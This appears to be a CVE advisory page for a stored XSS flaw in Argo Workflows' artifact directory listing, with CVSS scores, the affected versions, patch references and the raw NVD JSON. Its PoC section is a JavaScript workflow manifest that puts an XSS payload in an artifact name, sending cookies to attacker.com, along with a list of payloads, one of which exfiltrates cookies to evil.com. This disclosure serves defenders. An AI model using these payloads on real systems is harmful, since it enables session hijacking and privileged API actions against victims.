Security Vulnerability Report
CVE-2026-23960 CVSS 5.4 MEDIUM

CVE-2026-23960

Published: 2026-01-21 22:15:51
Last Modified: 2026-02-17 16:56:21

Description

Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges. Versions 3.6.17 and 3.7.8 fix the issue.

CVSS Details

CVSS v3.1 Score (Primary)
5.4
Severity
MEDIUM
CVSS v3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS v4.0 Score (Secondary, CNA-supplied)
7.3 HIGH
CVSS v4.0 Vector
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")

Configurations (Affected Products)

cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:* (versions before 3.6.17) - VULNERABLE
cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:* (versions from 3.7.0 up to, but not including, 3.7.8) - VULNERABLE
Argo Workflows < 3.6.17
Argo Workflows >= 3.7.0 and < 3.7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-23960 PoC - Stored XSS in Argo Workflows Artifact Listing
// This PoC demonstrates how to inject malicious JavaScript through artifact filenames

// Step 1: Create a workflow with a crafted artifact filename containing XSS payload
const workflowTemplate = {
  apiVersion: 'argoproj.io/v1alpha1',
  kind: 'Workflow',
  metadata: { generateName: 'xss-poc-' },
  spec: {
    entrypoint: 'main',
    templates: [{
      name: 'main',
      container: {
        image: 'alpine:latest',
        command: ['sh', '-c'],
        args: ['echo "test"'],
        resources: {}
      },
      outputs: {
        artifacts: [{
          name: '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>',
          path: '/tmp/output.txt'
        }]
      }
    }]
  }
};

// Step 2: Submit the workflow via Argo API
// POST /api/v1/workflows/{namespace}
// Authorization: Bearer {token}

// Step 3: When victim views artifact list at:
// GET /api/v1/artifacts/{namespace}/{workflow}/...
// The XSS payload will execute in victim's browser

// Alternative simpler payload for testing:
const simplePayloads = [
  '<script>alert(document.domain)</script>',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(document.cookie)>',
  '<body onload=fetch("https://evil.com?"+btoa(document.cookie))>'
];

References

https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244 (Product: affected artifact server code)
https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17 (Patch)
https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17 (Product, Release Notes)
https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8 (Product, Release Notes)
https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23960", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:50.627", "lastModified": "2026-02-17T16:56:21.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges. Versions 3.6.17 and 3.7.8 fix the issue."}, {"lang": "es", "value": "Argo Workflows es un motor de flujo de trabajo de código abierto nativo de contenedores para orquestar trabajos paralelos en Kubernetes. Antes de las versiones 3.6.17 y 3.7.8, un XSS almacenado en el listado del directorio de artefactos permite a cualquier autor de flujo de trabajo ejecutar JavaScript arbitrario en el navegador de otro usuario bajo el origen del servidor Argo, lo que permite acciones de API con los privilegios de la víctima. 
Las versiones 3.6.17 y 3.7.8 solucionan el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", 
"integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*", "versionEndExcluding": "3.6.17", "matchCriteriaId": "FBACAF34-13D0-430F-8730-7613ADFE12D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*", "versionStartIncluding": "3.7.0", "versionEndExcluding": "3.7.8", "matchCriteriaId": "FBAC2E34-63C4-4F95-821A-4159E1B8300E"}]}]}], "references": [{"url": "https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}